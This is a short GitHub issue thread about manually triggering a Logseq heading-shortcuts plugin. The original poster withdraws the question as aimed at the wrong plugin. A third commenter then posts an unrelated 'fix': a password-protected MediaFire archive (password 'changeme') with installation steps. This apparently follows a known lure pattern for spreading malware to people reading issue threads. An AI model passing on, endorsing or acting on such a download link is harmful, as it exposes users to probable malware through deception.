### ISSUE TITLE
trigger the plugin manually

### ISSUE THREAD

**Issue by musikele** [vipzhicheng/logseq-plugin-heading-level-shortcuts#8]
Hello, i'd like to know if there's a way to trigger the plugin manually, instead of waiting for next day for it to work.

**Comment by musikele** [comment]
sorry this is not the plugin i intended to trigger

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
